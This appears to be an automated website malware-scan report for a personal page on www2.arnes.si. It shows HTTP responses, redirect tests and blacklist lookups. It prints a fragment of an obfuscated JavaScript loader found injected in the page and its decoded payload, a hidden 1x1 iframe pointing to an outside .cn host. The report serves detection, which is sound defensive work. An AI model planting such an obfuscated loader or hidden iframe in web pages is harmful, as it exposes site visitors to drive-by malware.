Scanned pages/files
Request | Server response | Status |
http://www2.arnes.si/~bzidan | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 23 Oct 2014 08:05:18 GMT Location: http://www2.arnes.si/~bzidan/ Server: Apache Content-Length: 300 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www2.arnes.si/~bzidan/ | 200 OK Content-Length: 10689 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function ge35ebc1854(a6cd0b741){var ab6b21af='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var k69359ed8='';var ka36c8b,d274c8b,a4430c2,h890589c2,w2c792f5d,i92032e5,d04cba01;var pea655a=0;do{h890589c2=ab6b21af.indexOf(a6cd0b741.charAt(pea655a++));w2c792f5d=ab6b21af.indexOf(a6cd0b741.charAt(pea655a++));i92032e5=ab6b21af.indexOf(a6cd0b741.charAt(pea655a++));d04cba01=ab6b21af.indexOf(a6cd0b741.charAt(pea655a++));ka36c8b=(h890589c2<<2)|(w2c792f5d>>4);d274c8b=((w2c79 Decoded script: <iframe src="http://yt6tyg.cn/1/index.php" width="1" height="1" frameborder="0"></iframe> Antivirus reports:
| ||
http://www2.arnes.si/~bzidan/Res/code/shared.js | 200 OK Content-Length: 5448 Content-Type: application/x-javascript | clean |
http://www2.arnes.si/Res/code/boxController.js | 404 Not Found Content-Length: 286 Content-Type: text/html | clean |
http://www2.arnes.si/test404page.js | 404 Not Found Content-Length: 275 Content-Type: text/html | clean |
http://www2.arnes.si/Res/code/boxSettings.js | 404 Not Found Content-Length: 284 Content-Type: text/html | clean |
http://www2.arnes.si/Res/tree/tree.js | 404 Not Found Content-Length: 277 Content-Type: text/html | clean |
http://www2.arnes.si/Res/tree/tree_items.js | 404 Not Found Content-Length: 283 Content-Type: text/html | clean |
http://www2.arnes.si/Res/tree/tree_tpl.js | 404 Not Found Content-Length: 281 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: www2.arnes.si
Result:
GET / HTTP/1.1
Host: www2.arnes.si
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: www2.arnes.si
Referer: http://www.google.com/search?q=www2.arnes.si
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: www2.arnes.si
Referer: http://www.google.com/search?q=www2.arnes.si
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=www2.arnes.si
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://www2.arnes.si/
Result: www2.arnes.si is not infected or malware details are not published yet.
Result: www2.arnes.si is not infected or malware details are not published yet.